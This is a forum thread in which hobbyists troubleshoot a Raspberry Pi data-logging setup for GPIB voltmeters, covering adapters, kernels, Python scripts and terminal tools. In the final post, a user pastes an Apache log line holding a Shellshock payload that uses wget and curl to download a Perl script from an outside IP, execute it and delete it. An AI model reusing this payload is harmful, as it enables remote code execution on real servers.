Poll

Interested/Instrument/Interface

Yes,3458A,GPIB
17 (23.9%)
Yes,3458A,Prologix
10 (14.1%)
Yes,K2001/K2002,GPIB
11 (15.5%)
Yes, post type of instrument and type of interface (GPIB,Prologix,USB,LAN, RS232)
29 (40.8%)
Not interested, why?
4 (5.6%)

Total Members Voted: 44

Voting closed: December 13, 2016, 11:12:53 am

Author Topic: Raspberry Pi2/3 logging platform for Voltnuts  (Read 144603 times)

Offline Dwaine

• Frequent Contributor
Re: Raspberry Pi2/3 logging platform for Voltnuts
« Reply #200 on: January 01, 2017, 01:29:09 am »
Not enough place :D (RPi 2 B+,7" LCD, Agilent 82357B, Bluetooth kbrd and mouse )
It's not working for now with Agilent 82357B, but it's only few minutes from start. (tuning is in progress) :)
Funny moment's with this keyboard (it is shit) :D (how to put the #? ou yes ctrl + alt + u and 23 )

82357B is not working, but we hope it will be fixed soon.
Maybe you can try to use different adapter like http://egirland.blogspot.cz/2014/03/arduino-uno-as-usb-to-gpib-controller.html

I got the Arduino going as a GPIB interface.   Just have to get the GPIB connector made to connect to my Rigol DM3068.

pi@raspberrypi:~ $ sudo bash connect2.sh /dev/ttyACM0 115200
++verbose
verbose: ON^M
^M
> ++ver
ARDUINO GPIB firmware by E. Girlando Version 6.1^M
^M
> ++info
Dwaine's Arduino Uno Rev 3 GPIB Device^M
^M
>

Online bingo600

• Super Contributor
« Reply #201 on: January 01, 2017, 09:24:24 am »
Kernel 4.x still works with the 82357x but only if you're using an original raspberry pi.
With kernel "Linux gpib 4.4.0-1-rpi #1 Debian 4.4.6-1+rpi14 (2016-05-05) armv6l GNU/Linux" and an original model B pi I've never lost communication with my 3458A using an original 82357B.
I set this up using TiN's howto on xdevs. The image that does graphing and has a web server would be a lot more fun though.

@Steve
Would you care to elaborate a bit ?

Especially where/how to get the initial raspbian image ?

Did you follow TiN's guide 100%, he specifically specifies get headers for a 3.x kernel
https://xdevs.com/guide/agilent_gpib_rpi/

This is the first time i have heard actuall confirmation that a kernel 4.x works w. an Agilent

I have an original Raspi 512Mb (v1) , and tried somewhat the same here
https://www.eevblog.com/forum/metrology/raspberry-pi23-logging-platform-for-voltnuts/msg1093160/#msg1093160

But my initial image was Noobs 1.41, meaning i ended up with a 3.x kernel.

/Bingo
« Last Edit: January 01, 2017, 09:58:36 am by bingo600 »

Offline TheSteve

• Supporter
  • Living the Dream
« Reply #202 on: January 01, 2017, 10:32:04 am »
I followed TiN's guide located here:
At the time I hadn't read this thread and knew nothing about any incompatibilities.

On my first try I started with raspbian jessie lite from here:
https://www.raspberrypi.org/downloads/raspbian/

I downloaded the newest version, it booted up but I couldn't login remotely as it appears to have sshd disabled by default - I run all of my raspberry pi's headless - no keyboard, monitor or mouse.
So I used an older build I already had downloaded for a different pi project. It was from May of 2016. You can find the older versions here:
https://downloads.raspberrypi.org/raspbian_lite/images/
edit - the specific build I used is "2016-05-27-raspbian-jessie-lite"

It booted right away and I was able to login remotely via ssh. I then pretty much followed TiN's howto substituting the proper kernel name etc as I went.

If I got any errors a long the way it was nothing major.
It has been working great ever since. I have had over 12 solid days of logging using some of TiN's sample python scripts that I modified a little. It hasn't crashed or had a single issue.
I am using an original generation pi, model B with 512 megs ram and an authentic 82357B.
Give it a try, I am sure it will work for you, if not we'll figure it out.
As a last ditch if needed I can make the exact image I used available for download. If your pi has a keyboard/monitor I would start by trying the newest version though.
« Last Edit: January 02, 2017, 03:08:41 am by TheSteve »
VE7FM

Offline plesaTopic starter

• Frequent Contributor
« Reply #203 on: January 01, 2017, 03:04:29 pm »
I followed TiN's guide located here:
At the time I hadn't read this thread and knew nothing about any incompatibilities.

On my first try I started with raspbian jessie lite from here:
https://www.raspberrypi.org/downloads/raspbian/

I downloaded the newest version, it booted up but I couldn't login remotely as it appears to have sshd disabled by default - I run all of my raspberry pi's headless - no keyboard, monitor or mouse.
So I used an older build I already had downloaded for a different pi project. It was from May of 2016. You can find the older versions here:
https://downloads.raspberrypi.org/raspbian_lite/images/

It booted right away and I was able to login remotely via ssh. I then pretty much followed TiN's howto substituting the proper kernel name etc as I went.

If I got any errors a long the way it was nothing major.
It has been working great ever since. I have had over 12 solid days of logging using some of TiN's sample python scripts that I modified a little. It hasn't crashed or had a single issue.
I am using an original generation pi, model B with 512 megs ram and an authentic 82357B.
Give it a try, I am sure it will work for you, if not we'll figure it out.
As a last ditch if needed I can make the exact image I used available for download. If your pi has a keyboard/monitor I would start by trying the newest version though.

I tried several combinations RPI2/RPI3 and genuine and clone 82357B adapter without success. I used only the latest linux-gpib (4.0.3-r1) and gpib_firmware-2008-08-10
Oldest Raspbian ( 2016-02-09-raspbian-jessie.zip pdated of course but with kernel 4.1.17  )till 4.9 not working
Gentoo running on RPi2/RPI3 with kernels from 3.18  to 4.9 are not working.

Offline Assafl

• Frequent Contributor
« Reply #204 on: January 02, 2017, 07:11:59 am »
Well, I can't say I am surprised by theSteve's result - it did work once for me but I was never able to recreate it. Upon reboot it never worked again. At the time I thought it had to do with the pyVisa TiN installs at the end but even that did not work when I tried to reinstall.

It may have to do with one of the package updates/upgrade. I guess the moral of the story is if it works don't touch it (no updates no upgrades!)...

Offline BFX

• Frequent Contributor
« Reply #205 on: January 02, 2017, 09:13:20 am »
As a last ditch if needed I can make the exact image I used available for download.
Please do that.

In the meantime I'll try to recreate my again.
It's fantastic news. :-+

Offline Assafl

• Frequent Contributor
« Reply #206 on: January 02, 2017, 09:38:45 am »
As a last ditch if needed I can make the exact image I used available for download.
Please do that.

^ +1  :-+

Online bingo600

• Super Contributor
« Reply #207 on: January 02, 2017, 11:11:55 am »
Just got some more info from Steve

Kernel 4.x still works with the 82357x but only if you're using an original raspberry pi.
With kernel "Linux gpib 4.4.0-1-rpi #1 Debian 4.4.6-1+rpi14 (2016-05-05) armv6l GNU/Linux" and an original model B pi I've never lost communication with my 3458A using an original 82357B.
I set this up using TiN's howto on xdevs. The image that does graphing and has a web server would be a lot more fun though.

I used - 2016-05-27-raspbian-jessie-lite

pi@gpib:~ $ gpib_config -v
linux-gpib version = 4.0.3 [r1652]

This seems like the latest SVN , at least just before Xmas

/Bingo
« Last Edit: January 02, 2017, 11:32:16 am by bingo600 »

Offline guenthert

• Frequent Contributor
« Reply #208 on: January 02, 2017, 07:06:21 pm »
[..]
When you run something from a shell(command prompt) it will typically "hold on to" the window. You can add an & after the command to have it run in the background. Right now if you loose your ssh/telnet connection to the pi the program/logging will also stop, if you add the & it will keep going.
That is generally not the case as the program to be started is connected to STDIN (the input from the current terminal session unless otherwise specified).  If you disconnect, programs started in that terminal session receive SIGHUP, which causes them to terminate (unless they specified a non-default signal handler).

You can let commands keep running in the background after you disconnect, by using the (standard) 'nohup' utility as follows:
`nohup your-program &`.

If you plan to reattach to that terminal session (e.g. if your network connection is unreliable), an utility like 'screen' (included in Debian/Raspbian, but sadly not installed by default) is needed.

Offline TheSteve

• Supporter
  • Living the Dream
« Reply #209 on: January 02, 2017, 07:18:41 pm »
Fair enough - there are some caveats to using it. Using "screen" probably is the best option for people - I've been using it for 20 years now.
VE7FM

• Frequent Contributor
« Reply #210 on: January 02, 2017, 07:41:29 pm »
Fair enough - there are some caveats to using it. Using "screen" probably is the best option for people - I've been using it for 20 years now.

I;m also using screen and it is preinstalled in image.
Basic usage:
sudo screen -S BME280      for run new screen seesiona named BME280 where you can execure for instance ./BME_Log.py, when script is running properly, by pressing Crtl+A followed by D session will be                disconnected
sudo screen -list                  will give you list of running sessions and their status
sudo screen -R BME280      will attach the screen called BME280.xxx

Offline z01z

• Regular Contributor
« Reply #211 on: January 02, 2017, 08:35:26 pm »
A small mod to the BME_Log.py script so that it runs with only one sensor present.

Offline linux-works

• Super Contributor
    • netstuff
« Reply #212 on: January 02, 2017, 08:43:58 pm »

screen is old and had bugs.

try tmux.  I'm a many year screen person, too, but tmux is what everyone at work seems to be using, with good success, and more features.

• Frequent Contributor
« Reply #213 on: January 02, 2017, 11:11:42 pm »
A small mod to the BME_Log.py script so that it runs with only one sensor present.

Thanks, I will put it to Github and to next image.

screen is old and had bugs.

try tmux.  I'm a many year screen person, too, but tmux is what everyone at work seems to be using, with good success, and more features.
I'm using screen for while and do not have reason to change it. I will give a try to tmux :)

Offline FrankBuss

• Supporter
    • Frank Buss
« Reply #214 on: January 02, 2017, 11:21:27 pm »

Maybe you should merge the open pull request, so that it doesn't run out of sync for too long, there were some changes from other people as well:

https://github.com/PlesaEEVBlog/RPi_LogNut/pulls
So Long, and Thanks for All the Fish
Electronics, hiking, retro-computing, electronic music etc.: https://www.youtube.com/c/FrankBussProgrammer

• Frequent Contributor
« Reply #215 on: January 03, 2017, 12:36:22 am »

Maybe you should merge the open pull request, so that it doesn't run out of sync for too long, there were some changes from other people as well:

It is in my plans, please be patient :)

Offline FrankBuss

• Supporter
    • Frank Buss
« Reply #216 on: January 03, 2017, 01:10:14 pm »

It is in my plans, please be patient :)

You know it is only one click in Github, if you agree with the commits? :)
So Long, and Thanks for All the Fish
Electronics, hiking, retro-computing, electronic music etc.: https://www.youtube.com/c/FrankBussProgrammer

Offline CalMachine

• Frequent Contributor
  • Metrology Nut
« Reply #217 on: January 03, 2017, 03:17:25 pm »
I tweaked the logging script slightly that was provided with the LogNut image and I am getting a "Command not found" return error.  And now for some reason, I am getting an error when trying to run the original script that was provided.  I have not altered the provided script in any way.

Anyone know what could be causing this?
All your volts are belong to me

Offline TiN

• Super Contributor
    • xDevs.com
« Reply #218 on: January 03, 2017, 03:36:21 pm »
Try to enter /pub/python/ directory with actual .py file and run python ./3458A_Log.py.
YouTube | Metrology IRC Chat room | Let's share T&M documentation? Upload! No upload limits for firmwares, photos, files.

Offline CalMachine

• Frequent Contributor
  • Metrology Nut
« Reply #219 on: January 03, 2017, 03:46:09 pm »
Try to enter /pub/python/ directory with actual .py file and run python ./3458A_Log.py.
ooo!!! Thank you so much!  I was missing the 'python' part in the command.  I think I've got it working now. 

• Frequent Contributor
« Reply #220 on: January 03, 2017, 04:55:25 pm »
ooo!!! Thank you so much!  I was missing the 'python' part in the command.  I think I've got it working now.

If you put #!/usr/bin/python2 as a first row of script you can omit python  and execute only by ./3458A_Log.py

BTW what di you changes in script, is it something for all us us? I'm put there there notification when internal temperature is increased something like "Clean filter".
Also found in different thread here this application made by member here for 3457A, which can be probably modified to 3458A.
It use the Arduino GPIB.

• Frequent Contributor
« Reply #221 on: January 03, 2017, 04:57:58 pm »
quote author=CalMachine link=topic=77301.msg1105349#msg1105349 date=1483458369]
[/quote]

If you put #!/usr/bin/python2 as a first row of script you can omit python  and execute only by ./3458A_Log.py

BTW what di you changes in script, is it something for all us us? I'm put there there notification when internal temperature is increased something like "Clean filter".
Also found in different thread here this application made by member here for 3457A, which can be probably modified to 3458A.
It use the Arduino GPIB.

You know it is only one click in Github, if you agree with the commits? :)
Yes, but I would like to review it and test it, so it takes more time.

Offline CalMachine

• Frequent Contributor
  • Metrology Nut
« Reply #222 on: January 03, 2017, 07:32:40 pm »
It use the Arduino GPIB.

I came to share my tweaks and when I copy pasted it, I noticed something I messed up... which led me to scrutinise the code more.  The tweaks I made were completely unnecessary, I feel.  I had added just a single measurement every so often of one of my 10V Standards, but then I noticed at the bottom you already had code that did just that.

Is there an easy way I can go about stopping a script that is currently running?
« Last Edit: January 03, 2017, 07:34:55 pm by CalMachine »

• Frequent Contributor
« Reply #223 on: January 03, 2017, 08:02:07 pm »
Press Ctrl+C

Offline Dwaine

• Frequent Contributor
« Reply #224 on: January 04, 2017, 05:57:54 am »
Anybody else getting this in their apache logs?  That's bad....

95.110.166.62 - - [03/Jan/2017:10:31:17 -0500] "GET / HTTP/1.0" 200 1434 "-" "() { :;}; /bin/bash -c \"wget http://139.59.246.200/so.pl -O /tmp/so.pl;curl -o /tmp/so.pl http://139.59.246.200/so.pl;chmod +x /tmp/so.pl;perl /tmp/so.pl;rm -rf /tmp/so.pl*\""

Share me

Digg  Facebook  SlashDot  Delicious  Technorati  Twitter  Google  Yahoo
Smf